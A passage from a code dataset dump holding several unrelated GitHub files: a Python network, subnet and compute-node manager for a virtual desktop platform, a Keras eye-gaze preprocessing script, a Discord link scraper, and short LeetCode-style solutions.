virtual_switch_uuid)\n ret = get_error_result(\"VSwitchNotExist\")\n return ret\n if data.get('subnet_info'):\n ret, status = self.check_subnet_params(data.get('subnet_info'))\n if not status:\n logger.error(\"create data-network error: check subnet params fail\")\n return ret\n # virtual_start_ip = data.get('subnet_info').get('start_ip')\n # virtual_end_ip = data.get('subnet_info').get('end_ip')\n # gateway = data.get('subnet_info').get('gateway')\n # netmask = data.get('subnet_info').get('netmask')\n # dns1 = data.get('subnet_info').get('dns1')\n # if not virtual_end_ip or not virtual_start_ip or not gateway or not netmask or not dns1:\n # logger.error(\"ParameterError\")\n # return get_error_result(\"ParameterError\")\n # _is_netmask, netmask_bits = is_netmask(netmask)\n # if _is_netmask:\n # network_num = ipaddress.ip_interface(virtual_start_ip + '/' + str(netmask_bits)).network\n # if ipaddress.ip_address(virtual_end_ip) not in network_num or ipaddress.ip_address(gateway) not in network_num:\n # logger.error(\"create data-network error: incorrect gateway\")\n # ret = get_error_result(\"GatewayAndIpError\")\n # return ret\n # if ipaddress.ip_network(virtual_start_ip).compare_networks(ipaddress.ip_network(virtual_end_ip)) >= 0:\n # logger.error(\"create data-network error: virtual start_ip:%s less than virtual! 
end_ip:%s or input ip in different network segments\"% (virtual_end_ip, virtual_start_ip))\n # ret = get_error_result(\"EndIPLessThanStartIP\")\n # return ret\n # else:\n # logger.error(\"subnet mask error: %s\"% netmask)\n # ret = get_error_result(\"SubnetMaskError\")\n # return ret\n ret = server_post(\"/network/create\", data)\n logger.info(\"create data-network server api return: %s\"% ret)\n return ret\n\n def update_network(self, data, uuid):\n \"\"\"\n 编辑网络\n :param data:\n :return:\n \"\"\"\n new_name = data.get(\"name\", \"\")\n network = self.get_object_by_name_and_not_uuid(YzyNetworks, new_name, uuid)\n if network:\n logger.error(\"update data-network error, the name[%s][%s] not change\"%(network.name, new_name))\n return get_error_result(\"UpdateNoChangeError\", param=new_name)\n data['uuid'] = uuid\n ret = server_post(\"/network/update\", data)\n return ret\n\n def delete_network(self, uuids):\n \"\"\"\n :param data:\n :return:\n \"\"\"\n ret = get_error_result(\"Success\")\n success_num = 0\n failed_num = 0\n try:\n for uuid in uuids:\n obj = self.get_object_by_uuid(YzyNetworks, uuid)\n if obj:\n templates = education_model.YzyInstanceTemplate.objects.filter(deleted=False, network=obj).count()\n if templates > 0:\n failed_num += 1\n continue\n groups = education_model.YzyGroup.objects.filter(deleted=False, network=obj).count()\n if groups > 0:\n failed_num += 1\n continue\n desktops = education_model.YzyDesktop.objects.filter(deleted=False, network=obj).count()\n if desktops > 0:\n failed_num += 1\n continue\n personal_desktops = personal_model.YzyPersonalDesktop.objects.filter(deleted=False, network=obj).count()\n if personal_desktops > 0:\n failed_num += 1\n continue\n ret = server_post(\"/network/delete\", {'uuid': uuid})\n if ret.get(\"code\", -1) != 0:\n failed_num += 1\n else:\n success_num += 1\n else:\n failed_num += 1\n except Exception as e:\n logger.error(\"delete network failed:%s\", e, exc_info=True)\n return get_error_result(\"DataNetworkDeleteFail\")\n \n msg = \"删除数据网络 %s\" % ('/'.join(uuids))\n insert_operation_log(msg, ret[\"msg\"])\n return get_error_result(\"Success\", data={\"failed_num\": failed_num, \"success_num\": success_num})\n\n @operation_record(\"添加计算节点 名称:{data[name]}, IP:{data[ip]}\")\n def add_node(self, data):\n \"\"\"\n data: {\n \"hostname\": \"controller\",\n \"ip\": \"172.16.1.11\",\n \"pool_name\": \"default\",\n \"pool_uuid\": \"ec92a530-4885-11ea-8e15-000c295dd728\",\n \"network_uuid\": \"ec796fde-4885-11ea-8e15-000c295dd728\",\n \"switch_uuid\": \"ec796624-4885-11ea-8e15-000c295dd728\",\n \"interface\": \"ens224\",\n \"manage_interface\": \"ens192\",\n \"image_interface\": \"ens192\"\n }\n :param data:\n :return:\n \"\"\"\n logger.info(\"add node KVM: %s\" % data)\n pool_name = data.get(\"pool_name\")\n pool_uuid = data.get(\"pool_uuid\")\n resource_pool = self.get_object_by_uuid(YzyResourcePools, pool_uuid)\n if not resource_pool:\n logger.error(\"add node KVM, pool_name: %s, pool_uuid: %s\"% (pool_name, pool_uuid))\n return get_error_result(\"ResourcePoolNameExistErr\", name = pool_name)\n switch_uuid = data.get(\"switch_uuid\")\n virtual_switch = self.get_object_by_uuid(YzyVirtualSwitchs, switch_uuid)\n if not virtual_switch:\n logger.error(\"add node KVM, switch_name, switch_uuid: %s\"% switch_uuid)\n return get_error_result(\"VSwitchNotExist\")\n ret = server_post(\"/api/v1/node/check\", data)\n if ret.get('code') != 0:\n logger.info(\"add node KVM failed:%s\", ret['msg'])\n return ret\n logger.info(\"add node KVM success, data: 
%s\", data)\n return ret\n\n @operation_record(\"编辑计算节点 名称:{data[hostname]}, IP:{data[ip]}, name: {data[name]}\")\n def update_node(self, data):\n \"\"\"\n data {\n \"uuid\": \"xxxxxxxxxxxxxxxx-xxxxxxxxxx\",\n \"hostname\": \"xxxxxx\",\n \"ip\": \"xxxxxxxx\",\n \"name\": \"xxxxxx\"\n }\n :param data:\n :return:\n \"\"\"\n # pass\n uuid = data.get(\"uuid\")\n hostname = data.get(\"hostname\")\n node = self.get_object_by_uuid(YzyNodes, uuid)\n if not node:\n logger.error(\"update node info error, node: %s[%s] not exist\"%(hostname, uuid))\n return get_error_result(\"NodeNotExist\")\n\n name = data.get(\"name\")\n node.name = name\n node.save()\n return get_error_result(\"Success\")\n\n def delete_node(self, data):\n \"\"\"\n data : [\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"}\n ]\n 删除节点\n :return:\n \"\"\"\n names = []\n ret = get_error_result(\"Success\")\n for node in data:\n uuid = node.get(\"uuid\")\n hostname = node.get(\"hostname\")\n names.append(hostname)\n obj = self.get_object_by_uuid(YzyNodes, uuid)\n if obj:\n ret = server_post(\"/node/delete\", node)\n if ret.get(\"code\", -1) != 0:\n logger.error(\"delete node[%s] error: %s\"% (hostname, ret))\n break\n else:\n logger.error(\"delete node[%s] info not exist!\"% hostname)\n ret = get_error_result(\"NodeNotExistMsg\", hostname=hostname)\n msg = \"删除节点 %s\" % ('/'.join(names))\n insert_operation_log(msg, ret[\"msg\"])\n return ret\n\n def reboot_node(self, data):\n \"\"\"\n data : [\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"}\n ]\n :param data:\n :return:\n \"\"\"\n names = []\n ret = get_error_result(\"Success\")\n for node in data:\n uuid = node.get(\"uuid\")\n hostname = node.get(\"hostname\")\n names.append(hostname)\n obj = self.get_object_by_uuid(YzyNodes, uuid)\n if obj:\n ret = server_post(\"/node/reboot\", node)\n if ret.get(\"code\", -1) != 0:\n logger.error(\"reboot node[%s] error: %s\" % (hostname, ret))\n break\n else:\n logger.error(\"reboot node[%s] info not exist!\" % hostname)\n ret = get_error_result(\"NodeNotExistMsg\", hostname=hostname)\n msg = \"重启节点 %s\" % ('/'.join(names))\n insert_operation_log(msg, ret[\"msg\"])\n return ret\n\n def shutdown_node(self, data):\n \"\"\"\n data : [\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"}\n ]\n :param data:\n :return:\n \"\"\"\n names = []\n ret = get_error_result(\"Success\")\n for node in data:\n uuid = node.get(\"uuid\")\n hostname = node.get(\"hostname\")\n names.append(hostname)\n obj = self.get_object_by_uuid(YzyNodes, uuid)\n if obj:\n ret = server_post(\"/node/shutdown\", node)\n if ret.get(\"code\", -1) != 0:\n logger.error(\"shutdown node[%s] error: %s\" % (hostname, ret))\n break\n else:\n logger.error(\"shutdown node[%s] info not exist!\" % hostname)\n ret = get_error_result(\"NodeNotExistMsg\", hostname=hostname)\n msg = \"关机节点 %s\" % ('/'.join(names))\n insert_operation_log(msg, ret[\"msg\"])\n return ret\n\n def operate_node(self):\n pass\n\n\nnetwork_mgr = NetworkManager()\n\n\nclass SubnetManager(object):\n \"\"\"\n 子网管理\n \"\"\"\n\n def get_object_by_uuid(self, model, uuid):\n try:\n obj = model.objects.filter(deleted=False).get(uuid=uuid)\n return obj\n except Exception as e:\n return None\n\n def 
get_object_by_name(self, model, name, network_uuid):\n try:\n obj = model.objects.filter(deleted=False, network=network_uuid).get(name=name)\n return obj\n except Exception as e:\n return None\n\n # def check_subnet_params(self, data):\n # start_ip = data.get('start_ip')\n # end_ip = data.get('end_ip')\n # gateway = data.get('gateway')\n # netmask = data.get('netmask')\n # dns1 = data.get('dns1')\n # dns2 = data.get('dns2')\n # if not start_ip or not end_ip or not gateway or not netmask or not dns1:\n # raise Exception(\"param error\")\n # for i in (data['start_ip'], data['end_ip'], data['gateway']):\n # if not is_ip_addr(i):\n # _ip = i\n # raise Exception(\"%s is not ip address\" % _ip)\n # if not is_ip_addr(dns1):\n # raise Exception(\"%s is not ip address\" % dns1)\n #\n # if dns2 != '' and not is_ip_addr(data['dns2']):\n # raise Exception(\"%s is not ip address\" % dns2)\n #\n # _is_netmask, netmask_bits = is_netmask(netmask)\n # if not _is_netmask:\n # raise Exception(\"%s netmask error\" % netmask)\n #\n # network_num = ipaddress.ip_interface(start_ip + '/' + str(netmask_bits)).network\n # if ipaddress.ip_address(end_ip) not in network_num or ipaddress.ip_address(gateway) not in network_num:\n # raise Exception(\"start_ip %s, end_ip %s in the wrong sequence\"%(start_ip, end_ip))\n # # if not (start_ip[0:start_ip.rfind('.')] == start_ip[0:start_ip.rfind('.')] and start_ip[0:start_ip.rfind('.')] == gateway[0:gateway.rfind('.')] ):\n # # raise Exception(\"start_ip %s, end_ip %s in the wrong sequence\"%(data['start_ip'], data['end_ip']))\n #\n # if ipaddress.ip_network(data['start_ip']).compare_networks(ipaddress.ip_network(data['end_ip'])) >= 0:\n # raise Exception(\"start_ip %s, end_ip %s in the wrong sequence\"%(data['start_ip'], data['end_ip']))\n\n @operation_record(\"创建网络 {data_network_uuid} 的子网 {data[name]}\")\n def create_subnet(self, data, data_network_uuid, request):\n # pass\n data['network_uuid'] = data_network_uuid\n network = self.get_object_by_uuid(YzyNetworks, data_network_uuid)\n if not network:\n logger.error(\"create subnet error: network[%s] not exist!\"%(data_network_uuid))\n return get_error_result(\"NetworkInfoNotExist\")\n name = data.get(\"name\")\n subnet = self.get_object_by_name(YzySubnets, name, data_network_uuid)\n if subnet:\n logger.error(\"create subnet error: subnet name [%s] is repeat\"% name)\n return get_error_result(\"SubnetNameRepeatError\", name=name)\n\n subnets = YzySubnets.objects.filter(network=network, deleted=False)\n ret, status = network_mgr.check_subnet_params(data, subnets)\n if not status:\n logger.error(\"create subnet error: check subnet params fail\")\n return ret\n #\n # try:\n # self.check_subnet_params(data, subnets)\n # exit_subnets = []\n # for subnet in subnets:\n # flag_a = ipaddress.ip_network(data['start_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n # flag_b = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n # flag_c = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n # flag_d = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['end_ip']))\n # flag_e = ipaddress.ip_network(subnet.start_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n # flag_f = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.end_ip))\n # if (flag_a >= 0 and flag_b >= 0) or (flag_c >= 0 and flag_d >= 0) or (flag_e >= 0 and flag_f >= 0):\n # exit_subnets.append(subnet)\n # if 
len(exit_subnets) > 0:\n # return get_error_result(\"IpAddressConflictError\")\n # except Exception as e:\n # logger.error(\"create subnet error: subnet parameters[%s] error\"% data, exc_info=True )\n # return get_error_result(\"SubnetInfoError\", name=name)\n\n ret = server_post(\"/subnet/create\", data)\n logger.info(\"create subnet: server api return %s\"% ret)\n return ret\n\n def delete_subnet(self, uuids):\n \"\"\"\n data [\n {\"uuid\": \"1a870202-3732-11ea-8a2d-000c295dd728\",\"name\": \"xxxxx\"},\n {\"uuid\": \"1a870202-3732-11ea-8a2d-000c295dd728\",\"name\": \"xxxxx\"},\n {\"uuid\": \"1a870202-3732-11ea-8a2d-000c295dd728\",\"name\": \"xxxxx\"}\n ]\n :param data:\n :return:\n \"\"\"\n ret = get_error_result(\"Success\")\n # for uuid in uuids:\n # obj = self.get_object_by_uuid(YzySubnets, uuid)\n # if obj:\n # # 判断是否被占用\n # templates = YzyInstanceTemplate.objects.filter(subnet_uuid=uuid, deleted=False).all()\n # if templates:\n # logger.error(\"delete subnet[%s] error, is be used\"% uuid)\n\n ret = server_post(\"/subnet/delete\", {'uuids': uuids})\n # if ret.get(\"code\", -1) != 0:\n # logger.error(\"delete subnet[%s] error: %s\" % (uuid, ret))\n # break\n # else:\n # logger.error(\"delete subnet[%s] info not exist!\" % uuid)\n # ret = get_error_result(\"SubnetNotExist\")\n msg = \"删除子网 %s\" % ('/'.join(uuids))\n insert_operation_log(msg, ret[\"msg\"])\n return ret\n\n @operation_record(\"修改子网信息 {data[name]}\")\n def update_subnet(self, data, data_network_uuid, sub_network_uuid):\n subnets = YzySubnets.objects.filter(network=data_network_uuid, deleted=False).exclude(uuid=sub_network_uuid)\n ret, status = network_mgr.check_subnet_params(data, subnets)\n if not status:\n logger.error(\"update subnet error: check subnet params fail\")\n return ret\n # try:\n # subnets = YzySubnets.objects.filter(network=data_network_uuid, deleted=False)\n # self.check_subnet_params(data, subnets)\n # for subnet in subnets:\n # if subnet.uuid != sub_network_uuid:\n # flag_a = ipaddress.ip_network(data['start_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n # flag_b = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n # flag_c = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n # flag_d = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['end_ip']))\n # flag_e = ipaddress.ip_network(subnet.start_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n # flag_f = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.end_ip))\n # if (flag_a >= 0 and flag_b >= 0) or (flag_c >= 0 and flag_d >= 0) or (flag_e >= 0 and flag_f >= 0):\n # return get_error_result(\"IpAddressConflictError\")\n # except Exception as e:\n # logger.error(\"update subnet error: subnet parameters[%s] error:%s\", data, e, exc_info=True)\n # return get_error_result(\"SubnetInfoError\", name=data['name'])\n data[\"uuid\"] = sub_network_uuid\n ret = server_post('/subnet/update', data)\n logger.info(\"update subnet: server api return %s\", ret)\n return ret\n\n\nsubnet_mgr = SubnetManager()","repo_name":"xiaomo-shu/shangcheng","sub_path":"yzy_web/web_manage/yzy_resource_mgr/resource_manager/network_manager.py","file_name":"network_manager.py","file_ext":"py","file_size_in_byte":22652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29581563152","text":"# 2021-02-22 videorighter\n# data preprocessing(binary)\n\n# At 
macbook\nimport label_preprocess\n# At home\n# import label_preprocess\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport warnings\nimport os\nimport glob\nfrom tqdm import tqdm_gui\nimport pickle\nimport time\n\nwarnings.filterwarnings('ignore')\n\n\ndef result(tmp_input, tmp_target):\n result_input = tmp_input.reshape(-1, 150, 109)\n\n max_tmp_target = tmp_target.max()\n shape = (tmp_target.size, max_tmp_target.astype(int) + 1)\n\n result_target = np.zeros(shape)\n rows = np.arange(tmp_target.size)\n\n # 0 = [1, 0](미집중) / 1 = [0, 1](집중)\n result_target[rows.astype(int), tmp_target.astype(int)] = 1\n\n return result_input, result_target\n\n\ndef split_dataset(input_dir, target_dir, random_state=200):\n with open(input_dir, 'rb') as f:\n input = pickle.load(f)\n with open(target_dir, 'rb') as f:\n target = pickle.load(f)\n\n X_train, X_pre, y_train, y_pre = train_test_split(input,\n target,\n test_size=0.2,\n random_state=random_state,\n shuffle=True,\n stratify=target)\n\n X_val, X_test, y_val, y_test = train_test_split(X_pre,\n y_pre,\n test_size=0.5,\n random_state=random_state,\n shuffle=True,\n stratify=y_pre)\n\n return X_train, X_val, X_test, y_train, y_val, y_test\n\n\nclass Dataloader:\n\n def __init__(self, csvlist, labeldict):\n self.tmp_input = np.array([])\n self.tmp_target = np.array([])\n self.csv_list = csvlist\n self.label_dict = labeldict\n self.label_dict_copy = labeldict.copy()\n\n def loop(self):\n\n for path in tqdm_gui(self.csv_list):\n print(path)\n data = pd.read_csv(path)\n\n # 109 features\n data = data[\n ['frame', 'face_id', 'timestamp', 'confidence', 'success', 'gaze_0_x', 'gaze_0_y', 'gaze_0_z',\n 'gaze_1_x',\n 'gaze_1_y', 'gaze_1_z', 'gaze_angle_x', 'gaze_angle_y',\n 'eye_lmk_X_0', 'eye_lmk_X_1', 'eye_lmk_X_2', 'eye_lmk_X_3', 'eye_lmk_X_4', 'eye_lmk_X_5',\n 'eye_lmk_X_6',\n 'eye_lmk_X_7', 'eye_lmk_X_28', 'eye_lmk_X_29', 'eye_lmk_X_30', 'eye_lmk_X_31', 'eye_lmk_X_32',\n 'eye_lmk_X_33',\n 'eye_lmk_X_34', 'eye_lmk_X_35',\n 'eye_lmk_Y_0', 'eye_lmk_Y_1', 'eye_lmk_Y_2', 'eye_lmk_Y_3', 'eye_lmk_Y_4', 'eye_lmk_Y_5',\n 'eye_lmk_Y_6',\n 'eye_lmk_Y_7', 'eye_lmk_Y_28', 'eye_lmk_Y_29', 'eye_lmk_Y_30', 'eye_lmk_Y_31', 'eye_lmk_Y_32',\n 'eye_lmk_Y_33',\n 'eye_lmk_Y_34', 'eye_lmk_Y_35',\n 'eye_lmk_Z_0', 'eye_lmk_Z_1', 'eye_lmk_Z_2', 'eye_lmk_Z_3', 'eye_lmk_Z_4', 'eye_lmk_Z_5',\n 'eye_lmk_Z_6',\n 'eye_lmk_Z_7', 'eye_lmk_Z_28', 'eye_lmk_Z_29', 'eye_lmk_Z_30', 'eye_lmk_Z_31', 'eye_lmk_Z_32',\n 'eye_lmk_Z_33',\n 'eye_lmk_Z_34', 'eye_lmk_Z_35',\n 'X_0', 'X_1', 'X_2', 'X_3', 'X_4', 'X_5', 'X_6', 'X_7', 'X_8', 'X_9', 'X_10', 'X_11', 'X_12', 'X_13',\n 'X_14',\n 'X_15', 'X_16',\n 'Y_0', 'Y_1', 'Y_2', 'Y_3', 'Y_4', 'Y_5', 'Y_6', 'Y_7', 'Y_8', 'Y_9', 'Y_10', 'Y_11', 'Y_12', 'Y_13',\n 'Y_14',\n 'Y_15', 'Y_16',\n 'Z_0', 'Z_1', 'Z_2', 'Z_3', 'Z_4', 'Z_5', 'Z_6', 'Z_7', 'Z_8', 'Z_9', 'Z_10', 'Z_11', 'Z_12', 'Z_13',\n 'Z_14',\n 'Z_15', 'Z_16'\n ]]\n\n name = os.path.basename(path)\n file_name = os.path.splitext(name)[0]\n\n data = data.drop_duplicates(['frame'])\n\n condition_list = []\n for i, label in enumerate(self.label_dict[f'{file_name}']):\n '''\n 1, 6인 경우 pass\n 2, 3, 5인 경우 미집중(0)\n 4인 경우 \n 이전 5초가 4라면 다음 조건 아니면 0\n 이전 10초~5초가 4라면 다음조건 아니면 0\n 다음 5초가 4라면 1 아니면 0\n ->\n 첫 10초 미집중(0)\n 마지막 5초 미집중(0)\n 나머지는 집중(1)\n '''\n if label == '2' or label == '3' or label == '5':\n self.label_dict_copy[f'{file_name}'][i] = '0'\n elif label == '4':\n if label == self.label_dict[f'{file_name}'][i 
- 1]: # 이전 5초가 4라면 다음 조건 아니면 0\n if label == self.label_dict[f'{file_name}'][i - 2]: # 이전 10초~5초가 4라면 다음조건 아니면 0\n if label != self.label_dict[f'{file_name}'][i + 1]: # 다음 5초가 4라면 1 아니면 0\n self.label_dict_copy[f'{file_name}'][i] = '0'\n else:\n self.label_dict_copy[f'{file_name}'][i] = '1'\n else:\n self.label_dict_copy[f'{file_name}'][i] = '0'\n else:\n self.label_dict_copy[f'{file_name}'][i] = '0'\n else:\n pass\n # numpy select를 위한 condition list\n condition_list.append((data['timestamp'] >= i * 5) & (data['timestamp'] < (i + 1) * 5))\n\n # for _ in self.label_dict_copy[f'{file_name}']:\n # # 위 상태에서 label 부여\n data['label'] = np.select(condition_list, self.label_dict_copy[f'{file_name}'])\n\n idx_nm_expt_6 = data[data['label'] == '6'].index\n data_expt_6 = data.drop(idx_nm_expt_6, axis=0)\n\n for i in condition_list:\n sample_data = data_expt_6[i]\n\n if sample_data.empty:\n continue\n\n # 109 features\n sample_input = sample_data[[\n 'confidence', 'success', 'gaze_0_x', 'gaze_0_y', 'gaze_0_z', 'gaze_1_x', 'gaze_1_y', 'gaze_1_z',\n 'gaze_angle_x', 'gaze_angle_y', 'eye_lmk_X_0', 'eye_lmk_X_1', 'eye_lmk_X_2', 'eye_lmk_X_3',\n 'eye_lmk_X_4',\n 'eye_lmk_X_5', 'eye_lmk_X_6', 'eye_lmk_X_7', 'eye_lmk_X_28', 'eye_lmk_X_29', 'eye_lmk_X_30',\n 'eye_lmk_X_31',\n 'eye_lmk_X_32', 'eye_lmk_X_33', 'eye_lmk_X_34', 'eye_lmk_X_35', 'eye_lmk_Y_0', 'eye_lmk_Y_1',\n 'eye_lmk_Y_2',\n 'eye_lmk_Y_3', 'eye_lmk_Y_4', 'eye_lmk_Y_5', 'eye_lmk_Y_6', 'eye_lmk_Y_7', 'eye_lmk_Y_28',\n 'eye_lmk_Y_29',\n 'eye_lmk_Y_30', 'eye_lmk_Y_31', 'eye_lmk_Y_32', 'eye_lmk_Y_33', 'eye_lmk_Y_34', 'eye_lmk_Y_35',\n 'eye_lmk_Z_0', 'eye_lmk_Z_1', 'eye_lmk_Z_2', 'eye_lmk_Z_3', 'eye_lmk_Z_4', 'eye_lmk_Z_5',\n 'eye_lmk_Z_6',\n 'eye_lmk_Z_7', 'eye_lmk_Z_28', 'eye_lmk_Z_29', 'eye_lmk_Z_30', 'eye_lmk_Z_31', 'eye_lmk_Z_32',\n 'eye_lmk_Z_33', 'eye_lmk_Z_34', 'eye_lmk_Z_35',\n 'X_0', 'X_1', 'X_2', 'X_3', 'X_4', 'X_5', 'X_6', 'X_7', 'X_8', 'X_9', 'X_10', 'X_11', 'X_12',\n 'X_13',\n 'X_14', 'X_15', 'X_16',\n 'Y_0', 'Y_1', 'Y_2', 'Y_3', 'Y_4', 'Y_5', 'Y_6', 'Y_7', 'Y_8', 'Y_9', 'Y_10', 'Y_11', 'Y_12',\n 'Y_13',\n 'Y_14', 'Y_15', 'Y_16',\n 'Z_0', 'Z_1', 'Z_2', 'Z_3', 'Z_4', 'Z_5', 'Z_6', 'Z_7', 'Z_8', 'Z_9', 'Z_10', 'Z_11', 'Z_12',\n 'Z_13',\n 'Z_14', 'Z_15', 'Z_16'\n ]]\n\n trans = StandardScaler()\n input_data = trans.fit_transform(sample_input)\n target_data = sample_data['label'].astype(int)\n\n self.tmp_input = np.append(self.tmp_input,\n np.pad(input_data, ((0, 150 - len(input_data)), (0, 0)), 'constant'))\n self.tmp_target = np.append(self.tmp_target, target_data.unique()[0])\n\n return self.tmp_input, self.tmp_target\n\n\nif __name__ == '__main__':\n\n start = time.time()\n\n # At macbook\n csv_list = glob.glob('/Users/oldman/output_csv/*.csv')\n\n # At home\n # csv_list = glob.glob('/media/oldman/새 볼륨/output_csv/*.csv')\n label_dict = label_preprocess.labeling('./label_100.csv')\n\n label_dict_copy = label_dict.copy()\n\n dataloader = Dataloader(csvlist=csv_list, labeldict=label_dict_copy)\n tmp_input, tmp_target = dataloader.loop()\n print(tmp_input)\n print(tmp_input.shape)\n\n result_input, result_target = result(tmp_input=tmp_input,\n tmp_target=tmp_target)\n\n # dump standardized input pickle file\n with open('pre_result_input_bi.bin', 'wb') as file:\n pickle.dump(result_input, file)\n\n # dump standardized traget pickle file\n with open('pre_result_target_bi.bin', 'wb') as file:\n pickle.dump(result_target, file)\n\n # data split and dump pickle file\n X_train, X_val, X_test, y_train, y_val, y_test = 
split_dataset('./pre_result_input_bi.bin',\n './pre_result_target_bi.bin')\n\n with open('X_train.bin', 'wb') as file:\n pickle.dump(X_train, file)\n\n with open('X_val.bin', 'wb') as file:\n pickle.dump(X_val, file)\n\n with open('X_test.bin', 'wb') as file:\n pickle.dump(X_test, file)\n\n with open('y_train.bin', 'wb') as file:\n pickle.dump(y_train, file)\n\n with open('y_val.bin', 'wb') as file:\n pickle.dump(y_val, file)\n\n with open('y_test.bin', 'wb') as file:\n pickle.dump(y_test, file)\n\n print(\"Execution time: \", start - time.time())\n","repo_name":"videorighter/elearning_studies","sub_path":"data_preprocessing_keras_bi.py","file_name":"data_preprocessing_keras_bi.py","file_ext":"py","file_size_in_byte":10390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"798942509","text":"class Solution(object):\n def increasingTriplet(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n firstsmall = float('inf')\n secondsmall = float('inf')\n for i in nums:\n if i <= firstsmall:\n firstsmall = i\n elif i<=secondsmall:\n secondsmall = i\n else:\n return True\n return False","repo_name":"shank54/Leetcode","sub_path":"Increasing Triplet Subsequence.py","file_name":"Increasing Triplet Subsequence.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23145652070","text":"from src.url_finder import get_links\nfrom src.linkdata_model import Linkdata\n\n\nasync def scrap(message, client):\n retrieved_links = []\n channel = message.channel\n guild = message.guild\n async for history_message in channel.history(limit=10000):\n if history_message.author != client.user:\n results = get_links(history_message.content)\n if results is not None:\n for matched_url in results:\n retrieved_links.append(\n Linkdata(matched_url, guild.get_member(int(history_message.author.id)), history_message.created_at))\n return retrieved_links\n","repo_name":"Herbacha/discord-links-hound","sub_path":"src/links_scrapper.py","file_name":"links_scrapper.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32343695499","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'pylons' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER k\n# 2. 
INTEGER_ARRAY arr\n#\n# Sample Input: k = 2, arr = [0,1,1,1,1,0]\n#\n# Sample Output: Cities arr[1], arr[2], arr[3] and arr[4] are suitable for power plants\n# City arr[1] for cities arr[0] through to arr[3] = 1 power plant\n# City arr[4] for cities arr[4] and arr[5] = 1 power plant\n# return 2 power plants\n#\n\ndef pylons(k, arr):\n # Write your code here\n # Set starting distance to k minus 1 and power plants to 0\n distance = k-1\n last_distance = -1\n plants = 0\n \n # Iterate for suitable distribution plants \n while distance < len(arr):\n # if true, increment plants to 1, set last distance as current distance\n if arr[distance] == 1:\n plants += 1\n last_distance = distance\n \n # If distance plus k is beyond the list, break\n if (distance + k) >= len(arr):\n break\n # If double of k minus 1 plus current distance is within list, set it as distance or set end of the list as distance\n elif (2 * k-1) + distance < len(arr)-1:\n distance = (2 * k-1) + distance\n else:\n distance = len(arr) - 1\n \n # if true decrement by one and if distance is last distance return -1\n elif arr[distance] == 0:\n distance -= 1\n if distance == last_distance:\n return -1 \n \n return plants\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n first_multiple_input = input().rstrip().split()\n\n n = int(first_multiple_input[0])\n\n k = int(first_multiple_input[1])\n\n arr = list(map(int, input().rstrip().split()))\n\n result = pylons(k, arr)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Willibamba/HackerRank","sub_path":"problem-solving/algorithms-&-data-structures/Greedy Algorithms/goodland_electricity.py","file_name":"goodland_electricity.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74337237970","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\ndef getLen (node) :\n _len = 0\n while node != None :\n node = node.next \n _len = _len + 1\n return _len\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n \n A = []\n \n intersectVal = 0\n listA = headA\n listB = headB\n skipA = 0\n skipB = 0\n \n lenA = getLen(listA)\n lenB = getLen(listB)\n isSwap = False\n \n if lenA < lenB :\n isSwap = True\n listA,listB = listB,listA\n lenA,lenB = lenB,lenA\n \n while lenA > lenB :\n if listA == listB :\n intersectVal = listA.val\n return listA\n \n lenA = lenA - 1 \n listA = listA.next\n skipA = skipA + 1\n\n while listA != None :\n if listA == listB :\n if isSwap :\n listA,listB = listB,listA\n skipA,skipB = skipB,skipA\n intersectVal = listA.val\n return listA\n\n listA = listA.next\n skipA = skipA + 1\n listB = listB.next\n skipB = skipB + 1","repo_name":"GoldF15h/LeetCode","sub_path":"160. Intersection of Two Linked Lists.py","file_name":"160. 
